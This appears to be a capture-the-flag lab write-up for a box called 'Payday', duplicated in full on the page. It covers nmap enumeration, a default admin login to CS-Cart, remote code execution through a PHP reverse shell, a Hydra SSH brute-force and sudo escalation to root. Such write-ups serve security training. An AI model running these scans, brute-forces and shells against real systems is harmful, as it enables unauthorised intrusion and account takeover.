Payday

Use sudo su with full sudo rights

Summary

Discovered multiple open services including Apache, IMAP/POP3, Samba, and SSH.
CS-Cart web application on port 80 allowed default login as admin:admin.
Used exploit for CS-Cart to get RCE via PHP webshell.
SSH brute-forced user patrick's credentials using Hydra.
Privilege escalation via sudo su as patrick had full sudo access.

🧵 Let's Unpack

🔎 Enumeration

nmap -A -T4 -sC -sN -oN nmapFull -p 22,80,110,139,143,445,993,995 192.168.167.39

Port 80 hosted CS-Cart (Apache 2.2.4 with PHP 5.2.3)
IMAP, POP3, and SSL variants running via Dovecot
Samba open on ports 139 and 445
SSH running OpenSSH 4.6p1

⚡ Initial Foothold

Web login worked with default creds: admin:admin
Got a shell as www-data

python -c 'import pty; pty.spawn("/bin/bash")'

🪜 Privilege Escalation

SSH brute-force was required for user patrick

hydra -L users.txt -P users.txt -e nsr -q ssh://192.168.167.39 -t 4 -w 5 -f
[22][ssh] host: 192.168.120.85   login: patrick   password: patrick




# Login found: patrick : patrick
ssh patrick@192.168.167.39

Full sudo access for patrick allowed immediate escalation:

# using SUdo
sudo -l
>
User patrick may run the following commands on this host:
    (ALL) ALL

# simply doing sudo su gave us root shell
sudo su

## Boom bot proof.txt

PreviousPelican NextSnookums

Last updated 1 month ago

Was this helpful?

Payday

Use sudo su with full sudo rights

Summary

Discovered multiple open services including Apache, IMAP/POP3, Samba, and SSH.
CS-Cart web application on port 80 allowed default login as admin:admin.
Used exploit for CS-Cart to get RCE via PHP webshell.
SSH brute-forced user patrick's credentials using Hydra.
Privilege escalation via sudo su as patrick had full sudo access.

🧵 Let's Unpack

🔎 Enumeration

nmap -A -T4 -sC -sN -oN nmapFull -p 22,80,110,139,143,445,993,995 192.168.167.39

Port 80 hosted CS-Cart (Apache 2.2.4 with PHP 5.2.3)
IMAP, POP3, and SSL variants running via Dovecot
Samba open on ports 139 and 445
SSH running OpenSSH 4.6p1

⚡ Initial Foothold

Web login worked with default creds: admin:admin
Used CS-Cart exploit for RCE
Uploaded PHP reverse shell (Ivan Sincek’s from )
Got a shell as www-data

python -c 'import pty; pty.spawn("/bin/bash")'

🪜 Privilege Escalation

SSH brute-force was required for user patrick

hydra -L users.txt -P users.txt -e nsr -q ssh://192.168.167.39 -t 4 -w 5 -f
[22][ssh] host: 192.168.120.85   login: patrick   password: patrick




# Login found: patrick : patrick
ssh patrick@192.168.167.39

Full sudo access for patrick allowed immediate escalation:

# using SUdo
sudo -l
>
User patrick may run the following commands on this host:
    (ALL) ALL

# simply doing sudo su gave us root shell
sudo su

## Boom bot proof.txt

PreviousPelican NextSnookums

Last updated 1 month ago

Was this helpful?